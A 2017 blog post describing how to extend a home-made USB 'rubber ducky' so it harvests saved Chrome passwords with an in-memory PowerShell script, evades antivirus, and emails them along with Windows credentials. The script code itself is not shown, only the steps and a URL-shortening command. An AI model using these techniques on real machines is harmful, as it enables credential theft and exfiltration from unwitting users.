Tuesday, 21 March 2017

Further Weaponizing the Home-made Rubber Ducky

Today will be a follow up on my stealing Windows credentials with a home-made rubber ducky which you can read here. We are going to build on the existing code so we can also steal all saved Chrome logins/passwords and receive the results in the same email!

Chrome gives users the option to save your credentials for convenience:




If you are on Windows they are stored  in your users directory, in an encrypted SQLite database. They are encrypted using Windows Data Protection API which means they are going to be fairly easy to decrypt. Which is where I  came across a Powershell script which can harvest a browsers saved credentials called BrowserGather by sekirkity. Powershell is great as everything is executed in memory without touching the disc, helping us evade AV and be a lot more stealthy. Sekirkity did a great job with this script as it can extract the SQLite database and decrypt the data all within the Powershell session. At the moment it only supports Chrome passwords, but he is working on including history, cookie/session data and even other browsers, so our £6.50 Rubber Ducky just keeps growing!

So lets add it to our Mimidogz script:




  • We shortened our Github raw download with:

curl -i https://git.io -F "url=https://github.com/..."

  • Then Invoke the script with the Get-ChromeCreds
  • We have to convert our Chrome results as its type was a Powershell Custom Object which we couldn't send via email
  • Then we combine the two results into the body of the email

There we go! Just a few more lines and we have added Chrome credentials to our Windows credentials results!

Here are the results on my test VM:








Thanks for reading!

No comments:

Post a Comment